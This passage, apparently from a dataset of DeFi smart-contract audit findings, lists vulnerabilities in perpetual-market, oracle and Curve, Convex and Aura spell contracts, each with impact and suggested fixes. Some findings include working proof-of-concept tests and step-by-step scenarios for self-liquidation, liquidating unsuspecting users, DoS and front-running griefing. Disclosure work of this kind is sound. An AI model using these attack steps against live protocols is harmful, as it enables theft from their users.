targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: 
parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n makerRewardRate: parse6decimal('0'),\\n longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('500')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n dsu.transferFrom.whenCalledWith(userC.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userC).update(userC.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('10')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('10.000'), 0, collateral, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(""collateral before liquidation: "" + info.collateral + "" + "" + infoB.collateral + "" + "" + infoC.collateral + "" = "" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n 
setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n // liquidate\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('10')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(user.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n await market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n await market.connect(userC).update(userC.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(""collateral after liquidation: "" + info.collateral + "" + "" + infoB.collateral + "" + "" + infoC.collateral + "" = "" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n})\\n```\\n" +Market: DoS when stuffed with pending protected positions,medium,"In `_invariant`, there is a limit on the number of pending position updates. 
But for `protected` position updates, `_invariant` returns early and does not trigger this check.\\n```\\n function _invariant(\\n Context memory context,\\n address account,\\n Order memory newOrder,\\n Fixed6 collateral,\\n bool protected\\n ) private view {\\n // rest of code.\\n\\n if (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n // rest of code.\\n if (\\n context.global.currentId > context.global.latestId + context.marketParameter.maxPendingGlobal ||\\n context.local.currentId > context.local.latestId + context.marketParameter.maxPendingLocal\\n ) revert MarketExceedsPendingIdLimitError();\\n // rest of code.\\n }\\n```\\n\\nAfter the `_invariant` check, the position updates will be added into pending position queues.\\n```\\n _invariant(context, account, newOrder, collateral, protected);\\n\\n // store\\n _pendingPosition[context.global.currentId].store(context.currentPosition.global);\\n _pendingPositions[account][context.local.currentId].store(context.currentPosition.local);\\n```\\n\\nWhen the protocol enters next oracle version, the global pending queue `_pendingPosition` will be settled in a loop.\\n```\\n function _settle(Context memory context, address account) private {\\n // rest of code.\\n // settle\\n while (\\n context.global.currentId != context.global.latestId &&\\n (nextPosition = _pendingPosition[context.global.latestId + 1].read()).ready(context.latestVersion)\\n ) _processPositionGlobal(context, context.global.latestId + 1, nextPosition);\\n```\\n\\nThe OOG revert happens if there are too many pending position updates.\\nThis revert will happen on every `update` call because they all need to settle this `_pendingPosition` before `update`.\\n```\\n function update(\\n address account,\\n UFixed6 newMaker,\\n UFixed6 newLong,\\n UFixed6 newShort,\\n Fixed6 collateral,\\n bool protect\\n ) external nonReentrant whenNotPaused {\\n Context memory context = _loadContext(account);\\n 
_settle(context, account);\\n _update(context, account, newMaker, newLong, newShort, collateral, protect);\\n _saveContext(context, account);\\n }\\n```\\n","Either or both,\\nLimit the number of pending protected position updates that can be queued in `_invariant`.\\nLimit the number of global pending protected positions that can be settled in `_settle`.","The protocol will be fully nonfunctional and funds will be locked. There will be no recovery from this DoS.\\nA malicious user can trigger this intentionally at very low cost. Alternatively, this can occur during a volatile market period when there are massive liquidations.","```\\n function _invariant(\\n Context memory context,\\n address account,\\n Order memory newOrder,\\n Fixed6 collateral,\\n bool protected\\n ) private view {\\n // rest of code.\\n\\n if (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n // rest of code.\\n if (\\n context.global.currentId > context.global.latestId + context.marketParameter.maxPendingGlobal ||\\n context.local.currentId > context.local.latestId + context.marketParameter.maxPendingLocal\\n ) revert MarketExceedsPendingIdLimitError();\\n // rest of code.\\n }\\n```\\n" +It is possible to open and liquidate your own position in 1 transaction to overcome efficiency and liquidity removal limits at almost no cost,medium,"The user can liquidate his own position with 100% guarantee in 1 transaction by following these steps:\\nIt can be done on existing position or on a new position\\nRecord Pyth oracle prices with signatures until you encounter a price which is higher (or lower, depending on your position direction) than latest oracle version price by any amount.\\nIn 1 transaction do the following: 3.1. Make the position you want to liquidate at exactly the edge of liquidation: withdraw maximum allowed amount or open a new position with minimum allowed collateral 3.2. 
Commit non-requested oracle version with the price recorded earlier (this price makes the position liquidatable) 3.3. Liquidate your position (it will be allowed, because the position generates a minimum loss due to price change and becomes liquidatable)\\nSince all liquidation fee is given to user himself, liquidation of own position is almost free for the user (only the keeper and position open/close fee is paid if any).\\nThe scenario of liquidating unsuspecting user is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('panprog liquidate unsuspecting user / self in 1 transaction', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.2'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: 
parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n makerRewardRate: parse6decimal('0'),\\n longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('1000')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('100')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, collateral, false)\\n\\n // settle\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, 0, false)\\n\\n // withdraw\\n var collateral = parse6decimal('800')\\n dsu.transfer.whenCalledWith(userB.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('2.000'), 0, 0, collateral.mul(-1), false)\\n\\n // liquidate unsuspecting user\\n setupOracle('100.01', TIMESTAMP + 150, TIMESTAMP + 200);\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('100.01')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(userB.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('100.01', TIMESTAMP + 200, TIMESTAMP + 
300);\\n await market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n var pos = await market.positions(userB.address);\\n console.log(""Liquidated maker: collateral = "" + info.collateral + "" maker = "" + pos.maker);\\n\\n})\\n```\\n\\nConsole output for the code:\\n```\\nLiquidated maker: collateral = 99980000 maker = 0\\n```\\n\\nSelf liquidation is the same, just the liquidator does this in 1 transaction and is owned by userB.","Industry standard is to have initial margin (margin required to open position or withdraw collateral) and maintenance margin (margin required to keep the position solvent). Initial margin > maintenance margin and serves exactly for the reason to prevent users from being close to liquidation, intentional or not. I suggest to implement initial margin as a measure to prevent such self liquidation or unsuspected user liquidations. This will improve user experience (remove a lot of surprise liquidations) and will also improve security by disallowing intentional liquidations and cheaply overcoming the protocol limits such as efficiency limit: intentional liquidations are never good for the protocol as they're most often malicious, so having the ability to liquidate yourself in 1 transaction should definitely be prohibited.","There are different malicious actions scenarios possible which can abuse this issue and overcome efficiency and liquidity removal limitations (as they're ignored when liquidating positions), such as:\\nOpen large maker and long or short position, then liquidate maker to cause mismatch between long/short and maker (socialize positions). 
This will cause some chaos in the market, imbalance between long and short profit/loss and users will probably start leaving such chaotic market, so while this attack is not totally free, it's cheap enough to drive users away from competition.\\nOpen large maker, wait for long and/or short positions from normal users to accumulate, then liquidate most of the large maker position, which will drive taker interest very high and remaining small maker position will be able to accumulate big profit with a small risk.\\nJust open long/short position from different accounts and wait for the large price update and frontrun it by withdrawing max collateral from the position which will be in a loss, and immediately liquidate it in the same transaction: with large price update one position will be liquidated with bad debt while the other position will be in a large profit, total profit from both positions will be positive and basically risk-free, meaning it's at the expense of the other users. While this strategy is possible to do on its own, liquidation in the same transaction allows it to be more profitable and catch more opportunities, meaning more damage to the other protocol users.\\nThe same core reason can also cause unsuspecting user to be unexpectedly liquidated in the following scenario:\\nUser opens position (10 ETH long at $1000, with $10000 collateral). User is choosing very safe leverage = 1. Market maintenance is set to 20% (max leverage = 5)\\nSome time later the price is still $1000 and user decides to close most of his position and withdraw collateral, so he reduces his position to 2 ETH long and withdraws $8000 collateral, leaving his position with $2000 collateral. It appears that the user is at the safe leverage = 1 again.\\nRight in the same block the liquidator commits non-requested oracle with a price $999.999 and immediately liquidates the user.\\nThe user is unexpectedly liquidated even though he thought that he was at leverage = 1. 
But since collateral is withdrawn immediately, but position changes only later, user actually brought his position to max leverage and got liquidated. While this might be argued to be the expected behavior, it might still be hard to understand and unintuitive for many users, so it's better to prevent such situation from happening and the fix is the same as the one to fix self-liquidations.","```\\nit('panprog liquidate unsuspecting user / self in 1 transaction', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.2'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n makerRewardRate: parse6decimal('0'),\\n 
longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('1000')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('100')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, collateral, false)\\n\\n // settle\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, 0, false)\\n\\n // withdraw\\n var collateral = parse6decimal('800')\\n dsu.transfer.whenCalledWith(userB.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('2.000'), 0, 0, collateral.mul(-1), false)\\n\\n // liquidate unsuspecting user\\n setupOracle('100.01', TIMESTAMP + 150, TIMESTAMP + 200);\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('100.01')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(userB.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('100.01', TIMESTAMP + 200, TIMESTAMP + 300);\\n await market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n var pos = await 
market.positions(userB.address);\\n console.log(""Liquidated maker: collateral = "" + info.collateral + "" maker = "" + pos.maker);\\n\\n})\\n```\\n" +update() wrong privilege control,medium,"in `OracleFactory.update()` will call `oracle.update()`\\n```\\ncontract OracleFactory is IOracleFactory, Factory {\\n// rest of code\\n function update(bytes32 id, IOracleProviderFactory factory) external onlyOwner {\\n if (!factories[factory]) revert OracleFactoryNotRegisteredError();\\n if (oracles[id] == IOracleProvider(address(0))) revert OracleFactoryNotCreatedError();\\n\\n IOracleProvider oracleProvider = factory.oracles(id);\\n if (oracleProvider == IOracleProvider(address(0))) revert OracleFactoryInvalidIdError();\\n\\n IOracle oracle = IOracle(address(oracles[id]));\\n oracle.update(oracleProvider);\\n }\\n```\\n\\nBut `oracle.update()` permission is needed for `OracleFactory.owner()` and not `OracleFactory` itself.\\n```\\n function update(IOracleProvider newProvider) external onlyOwner {\\n _updateCurrent(newProvider);\\n _updateLatest(newProvider.latest());\\n }\\n\\n modifier onlyOwner {\\n if (msg.sender != factory().owner()) revert InstanceNotOwnerError(msg.sender);\\n _;\\n }\\n```\\n\\nThis results in `OracleFactory` not being able to do `update()`. 
Suggest changing the limit of `oracle.update()` to `factory()`.","```\\ncontract Oracle is IOracle, Instance {\\n// rest of code\\n\\n- function update(IOracleProvider newProvider) external onlyOwner {\\n+ function update(IOracleProvider newProvider) external {\\n+ require(msg.sender == factory(),""invalid sender"");\\n _updateCurrent(newProvider);\\n _updateLatest(newProvider.latest());\\n }\\n```\\n",`OracleFactory.update()` unable to add `IOracleProvider`,"```\\ncontract OracleFactory is IOracleFactory, Factory {\\n// rest of code\\n function update(bytes32 id, IOracleProviderFactory factory) external onlyOwner {\\n if (!factories[factory]) revert OracleFactoryNotRegisteredError();\\n if (oracles[id] == IOracleProvider(address(0))) revert OracleFactoryNotCreatedError();\\n\\n IOracleProvider oracleProvider = factory.oracles(id);\\n if (oracleProvider == IOracleProvider(address(0))) revert OracleFactoryInvalidIdError();\\n\\n IOracle oracle = IOracle(address(oracles[id]));\\n oracle.update(oracleProvider);\\n }\\n```\\n" +`_accumulateFunding()` maker will get the wrong amount of funding fee.,medium,"The formula that calculates the amount of funding in `Version#_accumulateFunding()` on the maker side is incorrect. 
This leads to an incorrect distribution of funding between the minor and the maker's side.\\n```\\n// Redirect net portion of minor's side to maker\\nif (fromPosition.long.gt(fromPosition.short)) {\\n fundingValues.fundingMaker = fundingValues.fundingShort.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingShort = fundingValues.fundingShort.sub(fundingValues.fundingMaker);\\n}\\nif (fromPosition.short.gt(fromPosition.long)) {\\n fundingValues.fundingMaker = fundingValues.fundingLong.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingLong = fundingValues.fundingLong.sub(fundingValues.fundingMaker);\\n}\\n```\\n\\nPoC\\nGiven:\\nlong/major: 1000\\nshort/minor: 1\\nmaker: 1\\nThen:\\nskew(): 999/1000\\nfundingMaker: 0.999 of the funding\\nfundingShort: 0.001 of the funding\\nWhile the maker only matches for `1` of the major part and contributes to half of the total short side, it takes the entire funding.","The correct formula to calculate the amount of funding belonging to the maker side should be:\\n```\\nfundingMakerRatio = min(maker, major - minor) / min(major, minor + maker)\\nfundingMaker = fundingMakerRatio * fundingMinor\\n```\\n",,```\\n// Redirect net portion of minor's side to maker\\nif (fromPosition.long.gt(fromPosition.short)) {\\n fundingValues.fundingMaker = fundingValues.fundingShort.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingShort = fundingValues.fundingShort.sub(fundingValues.fundingMaker);\\n}\\nif (fromPosition.short.gt(fromPosition.long)) {\\n fundingValues.fundingMaker = fundingValues.fundingLong.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingLong = fundingValues.fundingLong.sub(fundingValues.fundingMaker);\\n}\\n```\\n +CurveTricryptoOracle incorrectly assumes that WETH is always the last token in the pool which leads to bad LP pricing,high,"CurveTricryptoOracle.sol#L53-L63\\n```\\n if (tokens.length == 3) {\\n /// tokens[2] is WETH\\n uint256 
ethPrice = base.getPrice(tokens[2]);\\n return\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n }\\n```\\n\\nWhen calculating LP prices, CurveTricryptoOracle#getPrice always assumes that WETH is the last token in the pool. This isn't the case which will cause the LP to be massively overvalued.\\nThere are 6 tricrypto pools currently deployed on mainnet. Half of these pools have an asset other than WETH as token[2]:\\n```\\n 0x4ebdf703948ddcea3b11f675b4d1fba9d2414a14 - CRV\\n 0x5426178799ee0a0181a89b4f57efddfab49941ec - INV\\n 0x2889302a794da87fbf1d6db415c1492194663d13 - wstETH\\n```\\n",There is no need to assume that WETH is the last token. Simply pull the price for each asset and input it into lpPrice.,LP will be massively overvalued leading to overborrowing and protocol insolvency,"```\\n if (tokens.length == 3) {\\n /// tokens[2] is WETH\\n uint256 ethPrice = base.getPrice(tokens[2]);\\n return\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n }\\n```\\n" +ConvexSpell/CurveSpell.openPositionFarm will revert in some cases,medium,"The fix for this issue from this contest is as following:\\n```\\nFile: blueberry-core\\contracts\\spell\\CurveSpell.sol\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. 
Add liquidity on curve\\n address borrowToken = param.borrowToken;\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n //this 'if' check is the fix from the previous contest\\n110:-> if (tokens[i] == borrowToken) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n break;\\n }\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n```\\n\\nThe key to this issue is that `borrowBalance` may be smaller than `IERC20Upgradeable(borrowToken).balanceOf(address(this))`. For simplicity, assume that CurveSpell supports an lptoken which contains two tokens : A and B.\\nBob transferred 1wei of A and B to the CurveSpell contract. Alice opens a position by calling `BlueBerryBank#execute`, and the flow is as follows:\\nenter `CurveSpell#openPositionFarm`.\\ncall `_doLend` to deposit isolated collaterals.\\ncall `_doBorrow` to borrow 100e18 A token. 
borrowBalance = 100e18.\\n`A.approve(pool, 100e18)`.\\n`suppliedAmts[0] = A.balance(address(this)) = 100e18+1wei`, `suppliedAmts[1] = 0`.\\ncall `ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint)`, then revert because the approved amount is not enough.\\nTherefore, no one can successfully open a position.\\nOf course, bob can also transfer 1wei of `borrowToken` to contract by front-running `openPositionFarm` for a specific user or all users.","The following fix is for CurveSpell, but please don't forget ConvexSpell.\\nTwo ways for fix it:\\n```\\n--- a/blueberry-core/contracts/spell/CurveSpell.sol\\n+++ b/blueberry-core/contracts/spell/CurveSpell.sol\\n@@ -108,9 +108,7 @@ contract CurveSpell is BasicSpell {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n if (tokens[i] == borrowToken) {\\n- suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n- address(this)\\n- );\\n+ suppliedAmts[i] = borrowBalance;\\n break;\\n }\\n }\\n@@ -119,9 +117,7 @@ contract CurveSpell is BasicSpell {\\n uint256[3] memory suppliedAmts;\\n for (uint256 i = 0; i < 3; i++) {\\n if (tokens[i] == borrowToken) {\\n- suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n- address(this)\\n- );\\n+ suppliedAmts[i] = borrowBalance;\\n break;\\n }\\n }\\n@@ -130,9 +126,7 @@ contract CurveSpell is BasicSpell {\\n uint256[4] memory suppliedAmts;\\n for (uint256 i = 0; i < 4; i++) {\\n if (tokens[i] == borrowToken) {\\n- suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n- address(this)\\n- );\\n+ suppliedAmts[i] = borrowBalance;\\n break;\\n }\\n }\\n```\\n\\n```\\n--- a/blueberry-core/contracts/spell/CurveSpell.sol\\n+++ b/blueberry-core/contracts/spell/CurveSpell.sol\\n@@ -103,7 +103,8 @@ contract CurveSpell is BasicSpell {\\n\\n // 3. 
Add liquidity on curve\\n address borrowToken = param.borrowToken;\\n- _ensureApprove(param.borrowToken, pool, borrowBalance);\\n+ require(borrowBalance <= IERC20Upgradeable(borrowToken).balanceOf(address(this)), ""impossible"");\\n+ _ensureApprove(param.borrowToken, pool, IERC20Upgradeable(borrowToken).balanceOf(address(this)));\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n```\\n",`ConvexSpell/CurveSpell.openPositionFarm` will revert due to this issue.,"```\\nFile: blueberry-core\\contracts\\spell\\CurveSpell.sol\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. Add liquidity on curve\\n address borrowToken = param.borrowToken;\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n //this 'if' check is the fix from the previous contest\\n110:-> if (tokens[i] == borrowToken) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n break;\\n }\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n```\\n" +Mainnet oracles are incompatible with wstETH causing many popular yields strategies to be broken,medium,"ChainlinkAdapterOracle.sol#L111-L125\\n```\\n uint256 decimals = registry.decimals(token, USD);\\n (\\n uint80 roundID,\\n int256 answer,\\n ,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n ) = registry.latestRoundData(token, USD);\\n if (updatedAt < block.timestamp - maxDelayTime)\\n revert Errors.PRICE_OUTDATED(token_);\\n if (answer <= 0) revert Errors.PRICE_NEGATIVE(token_);\\n if (answeredInRound < roundID) revert Errors.PRICE_OUTDATED(token_);\\n\\n return\\n (answer.toUint256() * Constants.PRICE_PRECISION) / 10 ** decimals;\\n```\\n\\nChainlinkAdapterOracle only supports single asset price data. 
This makes it completely incompatible with wstETH because chainlink doesn't have a wstETH oracle on mainnet. Additionally Band protocol doesn't offer a wstETH oracle either. This only leaves Uniswap oracles which are highly dangerous given their low liquidity.",Create a special bypass specifically for wstETH utilizing the stETH oracle and its current exchange rate.,Mainnet oracles are incompatible with wstETH causing many popular yields strategies to be broken,"```\\n uint256 decimals = registry.decimals(token, USD);\\n (\\n uint80 roundID,\\n int256 answer,\\n ,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n ) = registry.latestRoundData(token, USD);\\n if (updatedAt < block.timestamp - maxDelayTime)\\n revert Errors.PRICE_OUTDATED(token_);\\n if (answer <= 0) revert Errors.PRICE_NEGATIVE(token_);\\n if (answeredInRound < roundID) revert Errors.PRICE_OUTDATED(token_);\\n\\n return\\n (answer.toUint256() * Constants.PRICE_PRECISION) / 10 ** decimals;\\n```\\n" +AuraSpell#closePositionFarm exits pool with single token and without any slippage protection,medium,"AuraSpell.sol#L221-L236\\n```\\n (\\n uint256[] memory minAmountsOut,\\n address[] memory tokens,\\n uint256 borrowTokenIndex\\n ) = _getExitPoolParams(param.borrowToken, lpToken);\\n\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n```\\n\\nWhen exiting the Balancer vault, closePositionFarm makes a subcall to _getExitPoolParams which is used to set minAmountsOut.\\nAuraSpell.sol#L358-L361\\n```\\n (address[] memory tokens, , ) = wAuraPools.getPoolTokens(lpToken);\\n\\n uint256 length = tokens.length;\\n uint256[] memory minAmountsOut = new uint256[](length);\\n```\\n\\nInside _getExitPoolParams we see that minAmountsOut are always an empty array. 
This means that the user has no slippage protection and can be sandwich attacked, suffering massive losses.",Allow user to specify min amount received from exit,Exits can be sandwich attacked causing massive loss to the user,"```\\n (\\n uint256[] memory minAmountsOut,\\n address[] memory tokens,\\n uint256 borrowTokenIndex\\n ) = _getExitPoolParams(param.borrowToken, lpToken);\\n\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n```\\n" +AuraSpell#closePositionFarm will take reward fees on underlying tokens when borrow token is also a reward,medium,"AuraSpell.sol#L227-L247\\n```\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n );\\n }\\n }\\n\\n /// 4. Swap each reward token for the debt token\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n address sellToken = rewardTokens[i];\\n if (sellToken == STASH_AURA) sellToken = AURA;\\n\\n _doCutRewardsFee(sellToken);\\n```\\n\\nWe can see above that closePositionFarm redeems the BLP before it takes the reward cut. This can cause serious issues. If there is any overlap between the reward tokens and the borrow token then _doCutRewardsFee will take a cut of the underlying liquidity. 
